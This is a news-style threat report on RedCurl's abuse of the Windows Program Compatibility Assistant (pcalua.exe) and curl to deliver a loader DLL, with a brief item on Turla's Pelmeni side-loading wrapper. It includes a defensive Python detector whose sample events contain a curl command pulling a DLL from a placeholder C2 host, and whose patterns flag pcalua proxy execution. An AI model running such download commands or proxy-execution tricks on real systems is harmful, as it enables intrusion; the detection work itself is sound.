The Russian-speaking cybercrime group known as RedCurl is leveraging a legitimate Microsoft Windows component known as the Program Compatibility Assistant (PCA) to execute malicious commands.
"The Program Compatibility Assistant Service (pcalua.exe) is a Windows service designed to identify and address compatibility issues with older programs," Trend Micro said in an analysis published this month.
"Adversaries can exploit this utility to enable command execution and bypass security restrictions by using it as an alternative command-line interpreter. In this investigation, the threat actor uses this tool to obscure their activities."
RedCurl, which is also known as Earth Kapre and Red Wolf, is known to have been active since at least 2018, orchestrating corporate cyber espionage attacks against entities located in Australia, Canada, Germany, Russia, Slovenia, the U.K., Ukraine, and the U.S.
In July 2023, F.A.C.C.T. revealed that a major Russian bank and an Australian company were targeted by the threat actor in November 2022 and May 2023 to pilfer confidential corporate secrets and employee information.
The attack chain examined by Trend Micro involves the use of phishing emails containing malicious attachments (.ISO and .IMG files) to activate a multi-stage process that begins with the use of cmd.exe to download a legitimate utility called curl from a remote server, which then acts as a channel to deliver a loader (ms.dll or ps.dll).
The malicious DLL file, in turn, leverages PCA to spawn a downloader process that takes care of establishing a connection with the same domain used by curl to fetch the loader.
Also used in the attack is the Impacket open-source software for unauthorized command execution.
The connections to Earth Kapre stem from overlaps in the command-and-control (C2) infrastructure as well as similarities with known downloader artifacts used by the group.
"This case underscores the ongoing and active threat posed by Earth Kapre, a threat actor that targets a diverse range of industries across multiple countries," Trend Micro said.
"The actor employs sophisticated tactics, such as abusing PowerShell, curl, and Program Compatibility Assistant (pcalua.exe) to execute malicious commands, showcasing its commitment to evading detection within targeted networks."
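As an added defender-side illustration, not code from the Trend Micro report: a small Python heuristic that flags the two process-creation patterns described above (cmd.exe driving curl to fetch a DLL, and pcalua.exe spawning a shell or download utility) over constructed sample events. The file paths, the domain and the event layout are assumptions, not indicators from the report.

```python
from __future__ import annotations
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    command_line: str   # command line of the created process


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# A command line that references a remote .dll, as in the curl-delivered loader stage.
DLL_URL = re.compile(r"https?://\S+\.dll\b", re.IGNORECASE)
# Utilities the article names as abused for command execution and download.
DOWNLOADERS = {"curl.exe", "powershell.exe"}


def detect(event: ProcEvent) -> list[str]:
    """Return the names of the heuristics the event matches (empty if benign)."""
    hits: list[str] = []
    parent, child = _basename(event.parent_image), _basename(event.image)
    # pcalua.exe normally wraps legacy installers; a child that is a shell or a
    # download utility is the "alternative command-line interpreter" abuse.
    if parent == "pcalua.exe" and child in DOWNLOADERS | {"cmd.exe"}:
        hits.append("pcalua_proxy_exec")
    # cmd.exe launching curl to fetch a DLL from a remote host is the first stage.
    if parent == "cmd.exe" and child == "curl.exe" and DLL_URL.search(event.command_line):
        hits.append("curl_dll_download")
    return hits


def scan(events: list[ProcEvent]) -> list[tuple[str, list[str]]]:
    """Return (child image name, matched heuristics) for every event that matched."""
    return [(_basename(e.image), detect(e)) for e in events if detect(e)]


# Constructed sample events (assumed paths and a reserved .invalid domain).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\curl.exe",
              r"curl.exe -o C:\Users\Public\ms.dll http://c2.example.invalid/ms.dll"),
    ProcEvent(r"C:\Windows\System32\pcalua.exe", r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c C:\Users\Public\run.bat"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
    ProcEvent(r"C:\Windows\System32\pcalua.exe", r"C:\Temp\setup.exe", "setup.exe /quiet"),
]

if __name__ == "__main__":
    for image, hits in scan(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(hits)}")
```

The last two sample events show the intended noise floor: an ordinary process launch and pcalua.exe wrapping a plain installer produce no hit.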
The development comes as the Russian nation-state group known as Turla (aka Iron Hunter, Pensive Ursa, Secret Blizzard, Snake, Uroburos, Venomous Bear, and Waterbug) has begun using a new wrapper DLL codenamed Pelmeni to deploy the .NET-based Kazuar backdoor.
Pelmeni – which masquerades as libraries related to SkyTel, NVIDIA GeForce Experience, vncutil, or ASUS – is loaded via DLL side-loading. Once this spoofed DLL is called by the legitimate software installed on the machine, it decrypts and launches Kazuar, Lab52 said.